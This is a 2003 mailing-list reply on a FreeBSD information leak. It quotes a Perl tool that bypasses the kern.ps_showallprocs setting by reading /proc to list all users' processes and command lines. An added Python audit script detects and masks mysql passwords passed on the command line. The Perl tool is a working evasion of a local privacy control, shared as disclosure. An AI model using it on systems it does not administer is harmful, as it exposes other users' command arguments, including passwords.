From: Jez Hancock (jez.hancock_at_munk.nu)
Date: Tue Jan 07 2003 - 03:18:00 CST

    On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
    > This is a little information leak. This bug(?) is not dangerous, but a
    > normal user can see all processes on the box using e.g. /bin/ps;
    This topic was addressed on freebsd-security list a while back, where
    someone also noted that all user process information can be obtained
    by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
    by looking at the contents of /proc. The following script was also
    posted by someone to demonstrate this:

    #!/usr/bin/perl
    #
    # hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
    # author: JohnnyB
    #
    # a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
    # option; an option that hides other users process information.
    # (why would they implement such a broken and easily evaded option?)
    # [and no this didn't take any skill. its basically an output format]
    #
    # Tested on FreeBSD 4.5-RC.

    print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
    opendir(DIR,"/proc");
    @procs=readdir(DIR);                 # every entry under /proc; numeric ones are pids
    closedir(DIR);
    foreach ${proc} (@procs){
     if(${proc}=~/[0-9]/o){
      unshift(@pids, ${proc});
     }
    }
    foreach $pid (@pids){
     open(FD, "ls -al /proc/$pid/file|");  # /proc/<pid>/file is a symlink to the executable
     while(<FD>){
      chomp;
      ${l}=$_;
      ${l}=~s/\s{1,}/ /g;
      if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
       &ppid(${1},${2},${pid},${3});       # owner, group, pid, link target
      }
     }
     close(FD);
    }
    exit(0);

    sub ppid(){
     (${a},${b},${c},${d})=@_;
     undef(${str});
     undef(${line});
     if(-e "/proc/$c/cmdline"){
      open(heh,"cat /proc/$c/cmdline|");
      @hah=<heh>;
      @chars=split(//,$hah[0]);
      foreach ${chr} (@chars){
       # cmdline is NUL-separated; turn anything non-printable into a space
       if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
        ${str}.=" ";
       }else{
        ${str}.=${chr};
       }
      }
      ${line}.=${a};
      while(length(${line})<11){${line}.=" ";} #alignment...
      ${line}.=" ".${b};
      while(length(${line})<23){${line}.=" ";}
      ${line}.=" ".${c};
      while(length(${line})<31){${line}.=" ";}
      chop(${str});
      if(${d}eq"unknown"){
       ${str}=~s/\s{1,}//g;
       ${line}.=" ("."${str}".")";
      }else{
       ${line}.=" "."${str}";
      }
      @line=split(//,${line});
      if(length(${line})>80){
       ${cntr}=0;
       foreach ${char} (@line){
        if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
         print "\n"." "x32; #^Anything >, deal with the rollover.
        }
        print "${char}";
        ${cntr}++;
       }
       print "\n";
      }
      else{
       print "${line}\n";
      }
      return(0);
     }
    }

    I believe someone (last poster in this thread?) also posted a patch on the same
    list, freebsd-security.

    It's annoying in that I see a lot of users running mysql with the -u and -p options:

    mysql -u user -p mypassword

    on the commandline, thinking that this info will not show up in ps listings when ps
    is run by other users. Ho hum...

    Regards,

    Jez Hancock
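An added audit script (not part of the post above, nor the hhp tool) that turns the point of the thread around for an administrator: it walks /proc the same way and reports any mysql client started with its password on the command line, masking the value rather than printing it. It assumes a /proc whose `<pid>/cmdline` files are NUL-separated argv buffers, as on Linux; the regex, function names and sample inputs are constructed for this example.

```python
import os
import re
from typing import List, Tuple

# Argument shapes that carry the password inline: "-pSECRET" or "--password=SECRET".
# A bare "-p" makes mysql prompt instead, so it is deliberately not matched.
INLINE_PASSWORD = re.compile(r"^(-p|--password=)(.+)$")


def parse_cmdline(raw: bytes) -> List[str]:
    """Split a /proc/<pid>/cmdline buffer (NUL-separated argv) into strings."""
    return [arg.decode("utf-8", "replace") for arg in raw.split(b"\0") if arg]


def redact_argv(argv: List[str]) -> Tuple[bool, List[str]]:
    """Return (password_on_cmdline, argv with any inline password masked).

    Only mysql-family clients (argv[0] basename starting with 'mysql') are
    inspected, so e.g. 'find -print' is not mistaken for '-p' + 'rint'.
    """
    if not argv or not os.path.basename(argv[0]).startswith("mysql"):
        return False, list(argv)
    found, out = False, []
    for arg in argv:
        m = INLINE_PASSWORD.match(arg)
        if m:
            found = True
            out.append(m.group(1) + "*" * 8)   # keep the flag, hide the value
        else:
            out.append(arg)
    return found, out


def scan_proc(proc_root: str = "/proc") -> List[Tuple[int, List[str]]]:
    """Report (pid, redacted argv) for every process exposing a password in argv."""
    hits = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue   # process already exited, or not readable with our privileges
        found, argv = redact_argv(parse_cmdline(raw))
        if found:
            hits.append((int(name), argv))
    return hits


if __name__ == "__main__":
    for pid, argv in scan_proc():
        print(f"pid {pid}: {' '.join(argv)}")
```

The fix for the users it finds is to give `-p` with no value so mysql prompts, or to put the password in a `[client]` section of a mode-0600 `~/.my.cnf`, which keeps it out of argv entirely.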